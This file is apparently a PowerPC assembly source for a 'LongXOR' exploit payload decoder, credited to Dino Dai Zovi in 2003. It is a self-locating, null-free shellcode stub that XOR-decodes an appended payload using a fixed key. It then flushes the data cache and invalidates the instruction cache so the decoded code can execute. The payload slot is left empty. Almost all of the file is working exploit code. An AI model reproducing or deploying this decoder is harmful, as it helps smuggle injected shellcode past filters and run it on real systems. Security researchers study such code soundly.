;;;
;;; PowerPC LongXOR Exploit Payload Decoder
;;;
;;; After assembling, place your favorite non-null bytes in the 2nd
;;; byte (reserved bits) of the sync and isync instructions.
;;;	
;;; Dino Dai Zovi <ddz@theta44.org>, 20030821
;;;

.globl main
.globl _main

_main:
main:
	;;; PowerPC GetPC() from LSD
	xor.	r5, r5, r5
	bnel	main
	mflr	r31
	addi	r31, r31, 72+1974	; 72 = distance from main -> payload
					; 1974 is null elliding constant
		
	subi	r5, r5, 1974		; We need this for the dcbf and icbi

	lis	r6, 0x9999		; Xor key = 0x99999999
	ori	r6, r6, 0x9999
	
	li	r4, 257+1		; 257+<number of words to decode>
	subi	r4, r4, 257
	mtctr	r4
Lxorlp:	lwz	r4, -1974(r31)
	xor	r4, r4, r6
	stw	r4, -1974(r31)

	;;;
	;;; Do the self-modifying code song and dance
	;;;
	dcbf	r5, r31			; Flush data cache block to memory
	sync				; Wait for flush to complete
	icbi	r5, r31			; Invalidate instruction cache block
	isync				; Toss prefetched instructions, etc.
	
	addi	r30, r5, -1970		; Advance r31 to next word
	add	r31, r31, r30
	
	bdnzf	eq, Lxorlp
payload:
	;;;
	;;; Insert XORed payload here
	;;;